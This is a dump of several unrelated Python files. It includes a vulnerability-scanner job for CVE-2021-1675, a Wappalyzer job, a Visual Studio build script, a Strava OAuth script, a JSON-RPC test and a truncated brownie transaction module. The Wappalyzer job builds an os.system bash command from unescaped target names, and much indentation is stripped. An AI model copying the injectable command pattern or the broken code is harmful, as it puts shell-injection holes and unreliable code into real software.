self.postprocess()
sys.stderr.write("cve_2021_1675 task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
        re_shit = re.compile(r'\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
hostresults = collections.defaultdict(list)
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
hostresults[m.groups()[0]].append(m.groups()[1])
for key in hostresults.keys():
results.append({'host': key, 'scantype': 'cve_2021_1675', 'status': '\n'.join(hostresults[key]), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'cve_2021_1675',
'jobid': self.ident,
'target': self.targets,
'domain': self.domain,
'user': self.user,
'pass': 'redacted',
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Wappalyzer(ScraperJob):
def __init__(self, targets, scheme='http', port='80', processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='wappalyzer'
self.targets = targets
self.scheme = scheme
self.port = port
def scan(self):
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
os.mkdir('output')
targetqueue = Queue(maxsize = 8)
commandline = "/bin/bash -c 'for x in %s ; do wappalyzer %s://$x:%s > output/$x ; done'"%\
(' '.join(self.targets), self.scheme, self.port)
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("wappalyzer task done\n")
def postprocess(self):
results = []
for x in os.listdir('output'):
j = json.loads(open(os.path.join('output', x), 'r').read())
open(os.path.join('output', x+'.txt'),'w').write(dict2str(j))
results.append({'host': x, 'scantype': 'wappalyzer', 'file': os.path.join('output', x+'.txt'), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'wappalyzer',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
|
build.py
|
import os, subprocess, threading;
sVSCommonTools = os.environ.get("VS120COMNTOOLS", None);
assert os.path.isdir(sVSCommonTools), "Cannot find Visual Studio";
gsIDEPath = os.path.normpath(os.path.join(sVSCommonTools, "..", "IDE"));
assert os.path.isdir(gsIDEPath), "Cannot find Visual Studio IDE";
gsWDExpressPath = os.path.join(gsIDEPath, "WDExpress.exe");
assert os.path.isfile(gsWDExpressPath), "Cannot find WDExpress.exe";
giErrorCount = 0;
def build(sFolderPath, sFileName, sPlatform, sConfig):
global giErrorCount;
oOutputLock.acquire();
print "Building %s (%s, %s)..." % (sFileName, sPlatform, sConfig);
oOutputLock.release();
sFilePath = os.path.join(sFolderPath, sFileName);
iTryCount = 1;
while iTryCount <= 2:
asCommandLine = [gsWDExpressPath, sFilePath, "/build"];
if sConfig:
asCommandLine.append(sPlatform and "%s|%s" % (sConfig, sPlatform) or sConfig);
oProcess = subprocess.Popen(asCommandLine, executable = gsWDExpressPath);
iReturnCode = oProcess.wait();
if iReturnCode == 1:
iTryCount += 1;
else:
break;
oOutputLock.acquire();
if iReturnCode != 0:
print "Build %s (%s, %s) failed! Error code: %d" % (sFileName, sPlatform, sConfig, iReturnCode);
giErrorCount += 1;
else:
print "Build %s (%s, %s) success!" % (sFileName, sPlatform, sConfig);
oOutputLock.release();
if __name__ == "__main__":
import sys;
sCWD = os.getcwd();
os.chdir(gsIDEPath);
oOutputLock = threading.Lock();
aoThreads = [];
sFolderPath = os.path.dirname(__file__);
for sFileName in os.listdir(sFolderPath):
sFilePath = os.path.join(sFolderPath, sFileName);
if sFileName[-4:].lower() == ".sln" and os.path.isfile(sFilePath):
for sConfig in ["Debug", "Release"]:
for sPlatform in ["Win32", "x64"]:
oThread = threading.Thread(target = build, args = (sFolderPath, sFileName, sPlatform, sConfig));
oThread.start();
aoThreads.append(oThread);
for oThread in aoThreads:
oThread.join();
os.chdir(sCWD);
if giErrorCount > 0:
raw_input("Press ENTER to exit...");
|
strava.py
|
#!/home/luca/dev/tools/miniconda3/envs/pyscripts/bin/python
import http.server
import os
import socketserver
import webbrowser
from datetime import datetime
from multiprocessing import Process
from time import sleep
from urllib.parse import urlsplit, parse_qs
from stravalib import Client
class LogHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server)
self._server = None
def do_GET(self):
query = urlsplit(self.path).query
params = parse_qs(query)
if 'code' in params:
code = params['code'][0]
print(code)
with open(".strava", 'w') as f:
f.write(code)
self.send_response(http.HTTPStatus.OK)
self.end_headers()
self.wfile.write(b'ok. code caught')
_srv = self._server
def _close():
print("Ready to close...")
sleep(5)
print("Closing...")
_srv.shutdown()
print("closed...")
Process(target=_close).start()
else:
self.send_response(http.HTTPStatus.BAD_REQUEST)
self.end_headers()
self.wfile.write(b'Sorry, code not found')
def auth_server():
port = 8080
handler = LogHandler
with socketserver.TCPServer(("", port), handler) as httpd:
print("serving at port", port)
handler._server = httpd
httpd.serve_forever()
def get_token(force=False):
    if force and os.path.exists('.strava'):
        os.remove('.strava')
# TODO file must be placed in user directory or script directory
if not os.path.exists('.strava'):
Process(target=auth_server).start()
sleep(5)
print('woke up')
webbrowser.open(client.authorization_url(client_id=CLIENT_ID,
redirect_uri='http://localhost:8080/authorized',
scope="view_private,write"))
while not os.path.exists('.strava'):
print("wait...")
sleep(2)
with open('.strava', 'r') as f:
code = f.readline()
return client.exchange_code_for_token(client_id=CLIENT_ID, client_secret=CLIENT_SECRET, code=code)
def _add_month(date):
m = date.month + 1
if m > 12:
m = 1
y = date.year + 1
else:
y = date.year
return datetime(year=y, month=m, day=date.day)
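# e.g. _add_month(datetime(2013, 12, 1)) -> datetime(2014, 1, 1); note the helper assumes
# the day of month also exists in the following month (it is only ever called with day=1 here).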
def collect_activities(flt=None, flt_collectors=None, collectors=None):
filtered_activities = list()
start_date = datetime(2013, 1, 1)
while start_date < datetime.now():
end_date = _add_month(start_date)
for activity in client.get_activities(before=end_date, after=start_date):
if flt and flt(activity):
filtered_activities.append(activity)
if flt_collectors:
for c in flt_collectors:
c(activity)
if collectors:
for c in collectors:
c(activity)
start_date = _add_month(start_date)
return filtered_activities
def update_wrong_gear():
get_token()
all_gears = set()
gears = set()
types = set()
distances = set()
activities = collect_activities(flt=lambda _a: _a.gear_id == 'g2284462' and _a.start_date.year < 2017,
flt_collectors=[lambda _a: types.add(_a.type),
lambda _a: distances.add(float(_a.distance)),
lambda _a: gears.add(_a.gear_id),
],
collectors=[lambda _a: all_gears.add(_a.gear_id)])
print("total activities: %i" % len(activities))
print("total distance: %f" % sum(distances, 0))
print("types: " + str(types))
print("all gears: " + str(all_gears))
print("gears: " + str(gears))
for a in activities:
print("Updating id: %i; date %s; type %s " % (a.id, str(a.start_date), a.type))
client.update_activity(a.id, gear_id="g1498034")
print("Done.")
CLIENT_ID = 99999
CLIENT_SECRET = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
token = None
client = Client()
if __name__ == '__main__':
update_wrong_gear()
|
test_jsonrpc.py
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def make_server(host='localhost', port=4325):
from wsgiref import simple_server
from windmill.dep import wsgi_jsonrpc
class Methods(object):
def test_1(self):
return u'test_1'
def test_2(self, value):
return value
methods = Methods()
def test_3():
return 'test3'
application = wsgi_jsonrpc.WSGIJSONRPCApplication(instance=methods, methods=[test_3])
return simple_server.make_server(host, port, application)
def test_jsonrpc_server(uri='http://localhost:4325/'):
from windmill.dep import wsgi_jsonrpc
json_tools = wsgi_jsonrpc.json_tools
jsonrpc_client = json_tools.ServerProxy(uri=uri)
assert jsonrpc_client.test_1() == {u'result':u'test_1'}
assert jsonrpc_client.test_2({'test':4}) == {u'result':{'test':4}}
assert jsonrpc_client.test_3() == {u'result':u'test3'}
if __name__ == "__main__":
import sys
from threading import Thread
run = True
try:
server = make_server()
        def test_wrapper():
            global run
            test_jsonrpc_server()
            run = False
            sys.exit()
thread = Thread(target=test_wrapper)
thread.start()
while run:
server.handle_request()
sys.exit()
except KeyboardInterrupt:
sys.exit()
|
transaction.py
|
#!/usr/bin/python3
import functools
import re
import sys
import threading
import time
from collections import deque
from enum import IntEnum
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import ContractNotFound, RPCRequestError
from brownie.project import build
from brownie.project import main as project_main
from brownie.project.compiler.solidity import SOLIDITY_ERROR_CODES
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import EventDict, _decode_logs, _decode_trace
from .web3 import web3
_marker = deque("-/|\\-/|\\")
def trace_property(fn: Callable) -> Any:
    # attributes that are only available after querying the transaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status < 0:
return None
if self._trace_exc is not None:
raise self._trace_exc
try:
return fn(self)
except RPCRequestError as exc:
if web3.supports_traces:
# if the node client supports traces, raise the actual error
raise exc
raise RPCRequestError(
f"Accessing `TransactionReceipt.{fn.__name__}` on a {self.status.name.lower()} "
"transaction requires the `debug_traceTransaction` RPC endpoint, but the node "
"client does not support it or has not made it available."
) from None
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class Status(IntEnum):
Dropped = -2
Pending = -1
Reverted = 0
Confirmed = 1
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
        revert_msg: Error string from reverted contract call
modified_state: Boolean, did this contract write to storage?"""
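    # Typical interactive usage (sketch; the txid below is a placeholder):
    #
    #   tx = TransactionReceipt("0x<txid>")
    #   tx.status            # Status.Confirmed / Status.Reverted / Status.Pending / Status.Dropped
    #   tx.events            # decoded logs (may require debug_traceTransaction for reverted txs)
    #   tx.wait(3)           # block until three confirmations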
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs: Optional[List] = None
nonce = None
sender = None
txid: str
txindex = None
type: int
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
is_blocking: bool = True,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
is_blocking: if True, creating the object is a blocking action until the required
confirmations are received
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
if not self._silent:
print(f"\rTransaction sent: {color('bright blue')}{txid}{color}")
# this event is set once the transaction is confirmed or dropped
        # it is used to wait during blocking transaction actions
self._confirmed = threading.Event()
# internal attributes
self._call_cost = 0
self._trace_exc: Optional[Exception] = None
self._trace_origin: Optional[str] = None
self._raw_trace: Optional[List] = None
self._trace: Optional[List] = None
self._events: Optional[EventDict] = None
self._return_value: Any = None
self._revert_msg: Optional[str] = None
self._dev_revert_msg: Optional[str] = None
self._modified_state: Optional[bool] = None
self._new_contracts: Optional[List] = None
self._internal_transfers: Optional[List[Dict]] = None
self._subcalls: Optional[List[Dict]] = None
# attributes that can be set immediately
self.sender = sender
self.status = Status(-1)
self.txid = str(txid)
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
if self._revert_pc is not None:
self._dev_revert_msg = build._get_dev_revert(self._revert_pc) or None
self._await_transaction(required_confs, is_blocking)
def __repr__(self) -> str:
color_str = {-2: "dark white", -1: "bright yellow", 0: "bright red", 1: ""}[self.status]
return f"<Transaction '{color(color_str)}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[EventDict]:
if self._events is None:
if self.status:
# relay contract map so we can decode ds-note logs
addrs = {log.address for log in self.logs} if self.logs else set()
contracts = {addr: state._find_contract(addr) for addr in addrs}
self._events = _decode_logs(self.logs, contracts=contracts) # type: ignore
else:
self._get_trace()
# get events from the trace - handled lazily so that other
# trace operations are not blocked in case of a decoding error
initial_address = str(self.receiver or self.contract_address)
self._events = _decode_trace(self._raw_trace, initial_address) # type: ignore
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def dev_revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._dev_revert_msg is None:
self._get_trace()
return self._dev_revert_msg or None
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
subcalls = filter(lambda s: not _is_call_to_precompile(s), self._subcalls) # type: ignore
return list(subcalls)
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status < 0:
return None
return web3.eth.get_block(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.block_number - self.block_number + 1
def replace(
self,
increment: Optional[float] = None,
gas_price: Optional[Wei] = None,
silent: Optional[bool] = None,
) -> "TransactionReceipt":
"""
Rebroadcast this transaction with a higher gas price.
Exactly one of `increment` and `gas_price` must be given.
Arguments
---------
increment : float, optional
Multiplier applied to the gas price of this transaction in order
to determine the new gas price
gas_price : Wei, optional
Absolute gas price to use in the replacement transaction
silent : bool, optional
Toggle console verbosity (default is same setting as this transaction)
Returns
-------
TransactionReceipt
New transaction object
"""
if increment is None and gas_price is None:
raise ValueError("Must give one of `increment` or `gas_price`")
if gas_price is not None and increment is not None:
raise ValueError("Cannot set `increment` and `gas_price` together")
if self.status > -1:
raise ValueError("Transaction has already confirmed")
if increment is not None:
gas_price = Wei(self.gas_price * increment)
if silent is None:
silent = self._silent
sender = self.sender
if isinstance(sender, EthAddress):
# if the transaction wasn't broadcast during this brownie session,
# check if the sender is unlocked - we might be able to replace anyway
from brownie import accounts
if sender in accounts:
sender = accounts.at(sender)
else:
raise ValueError("Sender address not in `accounts`")
return sender.transfer( # type: ignore
self.receiver,
self.value,
gas_limit=self.gas_limit,
gas_price=Wei(gas_price),
data=self.input,
nonce=self.nonce,
required_confs=0,
silent=silent,
)
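    # e.g. tx.replace(increment=1.1) rebroadcasts a still-pending transaction at 110% of
    # its current gas price, while tx.replace(gas_price="50 gwei") sets an absolute price.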
def wait(self, required_confs: int) -> None:
if required_confs < 1:
return
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.get_transaction(self.txid)
break
except TransactionNotFound:
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
self._confirmed.set()
return
time.sleep(1)
self._await_confirmation(tx["blockNumber"], required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if not web3.supports_traces:
# if traces are not available, do not attempt to determine the revert reason
raise exc or ValueError("Execution reverted")
if self._dev_revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
contract = state._find_contract(self.receiver)
if contract:
marker = "//" if contract._build["language"] == "Solidity" else "#"
line = self._traceback_string().split("\n")[-1]
if marker + " dev: " in line:
self._dev_revert_msg = line[line.index(marker) + len(marker) : -5].strip()
raise exc._with_attr(
source=source, revert_msg=self._revert_msg, dev_revert_msg=self._dev_revert_msg
)
def _await_transaction(self, required_confs: int, is_blocking: bool) -> None:
# await tx showing in mempool
while True:
try:
tx: Dict = web3.eth.get_transaction(HexBytes(self.txid))
break
except (TransactionNotFound, ValueError):
if self.sender is None:
# if sender was not explicitly set, this transaction was
# not broadcasted locally and so likely doesn't exist
raise
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
return
if not self._silent:
sys.stdout.write(f" Awaiting transaction in the mempool... {_marker[0]}\r")
sys.stdout.flush()
_marker.rotate(1)
time.sleep(1)
self._set_from_tx(tx)
if not self._silent:
if self.type == 2:
max_gas = tx["maxFeePerGas"] / 10 ** 9
priority_gas = tx["maxPriorityFeePerGas"] / 10 ** 9
output_str = (
f" Max fee: {color('bright blue')}{max_gas}{color} gwei"
f" Priority fee: {color('bright blue')}{priority_gas}{color} gwei"
)
else:
gas_price = self.gas_price / 10 ** 9
output_str = f" Gas price: {color('bright blue')}{gas_price}{color} gwei"
print(
f"{output_str} Gas limit: {color('bright blue')}{self.gas_limit}{color}"
f" Nonce: {color('bright blue')}{self.nonce}{color}"
)
# await confirmation of tx in a separate thread which is blocking if
# required_confs > 0 or tx has already confirmed (`blockNumber` != None)
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx["blockNumber"], required_confs), daemon=True
)
confirm_thread.start()
if is_blocking and (required_confs > 0 or tx["blockNumber"]):
confirm_thread.join()
def _await_confirmation(self, block_number: int = None, required_confs: int = 1) -> None:
# await first confirmation
block_number = block_number or self.block_number
nonce_time = 0.0
sender_nonce = 0
while True:
# every 15 seconds, check if the nonce increased without a confirmation of
# this specific transaction. if this happens, the tx has likely dropped
# and we should stop waiting.
if time.time() - nonce_time > 15:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
nonce_time = time.time()
try:
receipt = web3.eth.get_transaction_receipt(HexBytes(self.txid))
except TransactionNotFound:
receipt = None
# the null blockHash check is required for older versions of Parity
# taken from `web3._utils.transactions.wait_for_transaction_receipt`
if receipt is not None and receipt["blockHash"] is not None:
break
# continuation of the nonce logic 2 sections prior. we must check the receipt
# after querying the nonce, because in the other order there is a chance that
# the tx would confirm after checking the receipt but before checking the nonce
if sender_nonce > self.nonce: # type: ignore
self.status = Status(-2)
self._confirmed.set()
return
if not block_number and not self._silent and required_confs > 0:
if required_confs == 1:
sys.stdout.write(f" Waiting for confirmation... {_marker[0]}\r")
else:
sys.stdout.write(
f" Required confirmations: {color('bright yellow')}0/"
f"{required_confs}{color} {_marker[0]}\r"
)
_marker.rotate(1)
sys.stdout.flush()
time.sleep(1)
# silence other dropped tx's immediately after confirmation to avoid output weirdness
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx._silent = True
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.get_transaction_receipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.get_transaction(self.txid)
self.block_number = None
return self._await_confirmation(tx["blockNumber"], required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
if not self._silent and required_confs > 0:
print(self._confirm_output())
# set the confirmation event and mark other tx's with the same nonce as dropped
self._confirmed.set()
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx.status = Status(-2)
dropped_tx._confirmed.set()
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
if "gasPrice" in tx:
self.gas_price = tx["gasPrice"]
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
self.type = int(HexBytes(tx.get("type", 0)).hex(), 16)
# if receiver is a known contract, set function name
if self.fn_name:
return
try:
contract = state._find_contract(tx["to"])
if contract is not None:
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
except ContractNotFound:
# required in case the contract has self destructed
# other aspects of functionality will be broken, but this way we
# can at least return a receipt
pass
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = Status(receipt["status"])
if "effectiveGasPrice" in receipt:
self.gas_price = receipt["effectiveGasPrice"]
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{int(self.status)}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"], self.status == Status(1))
def _confirm_output(self) -> str:
status = ""
if not self.status:
revert_msg = self.revert_msg if web3.supports_traces else None
status = f"({color('bright red')}{revert_msg or 'reverted'}{color}) "
result = (
f"\r {self._full_name()} confirmed {status} "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.type == 2:
result += f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
if not web3.supports_traces:
raise RPCRequestError("Node client does not support `debug_traceTransaction`")
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "`debug_traceTransaction`. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the `skip_coverage` marker to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
if isinstance(trace[0]["gas"], str):
# handle traces where numeric values are returned as hex (Nethermind)
for step in trace:
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
self._dev_revert_msg = ""
if self._dev_revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)
selector = data[:4].hex()
if selector == "0x4e487b71": # keccak of Panic(uint256)
error_code = int(data[4:].hex(), 16)
if error_code in SOLIDITY_ERROR_CODES:
self._revert_msg = SOLIDITY_ERROR_CODES[error_code]
else:
self._revert_msg = f"Panic (error code: {error_code})"
elif selector == "0x08c379a0": # keccak of Error(string)
self._revert_msg = decode_abi(["string"], data[4:])[0]
else:
# TODO: actually parse the data
self._revert_msg = f"typed error: {data.hex()}"
elif self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
self._dev_revert_msg = ""
return
# check for dev revert string using program counter
dev_revert = build._get_dev_revert(step["pc"]) or None
if dev_revert is not None:
self._dev_revert_msg = dev_revert
if self._revert_msg is None:
self._revert_msg = dev_revert
else:
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
contract = state._find_contract(step["address"])
pc_map = contract._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 4
if trace[idx]["pc"] != step["pc"] - 4:
step = trace[idx]
# if this is the optimizer revert, find the actual source
if "optimizer_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 1
# look for the most recent jump
while trace[idx + 1]["op"] != "JUMPDEST":
if trace[idx]["source"] != step["source"]:
# if we find another line with a differing source offset prior
# to a JUMPDEST, the optimizer revert is also the actual revert
idx = trace.index(step)
break
idx -= 1
while not trace[idx]["source"]:
# now we're in a yul optimization, keep stepping back
# until we find a source offset
idx -= 1
# at last we have the real location of the revert
step["source"] = trace[idx]["source"]
step = trace[idx]
if "dev" in pc_map[step["pc"]]:
self._dev_revert_msg = pc_map[step["pc"]]["dev"]
else:
# extract the dev revert string from the source code
# TODO this technique appears superior to `_get_dev_revert`, and
# changes in solc 0.8.0 have necessitated it. the old approach
# of building a dev revert map should be refactored out in favor
# of this one.
source = contract._sources.get(step["source"]["filename"])
offset = step["source"]["offset"][1]
line = source[offset:].split("\n")[0]
marker = "//" if contract._build["language"] == "Solidity" else "#"
revert_str = line[line.index(marker) + len(marker) :].strip()
if revert_str.startswith("dev:"):
self._dev_revert_msg = revert_str
if self._revert_msg is None:
self._revert_msg = self._dev_revert_msg or ""
return
except (KeyError, AttributeError, TypeError, ValueError):
pass
if self._revert_msg is not None:
if self._dev_revert_msg is None:
self._dev_revert_msg = ""
return
op = next((i["op"] for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")), None)
self._revert_msg = "invalid opcode" if op == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._raw_trace is None:
self._get_trace()
if self._trace is not None:
# in case `_get_trace` also expanded the trace, do not repeat
return
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
if trace[0]["gasCost"] >= 21000:
# in ganache <6.10.0, gas costs are shifted by one step - we can
# identify this when the first step has a gas cost >= 21000
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
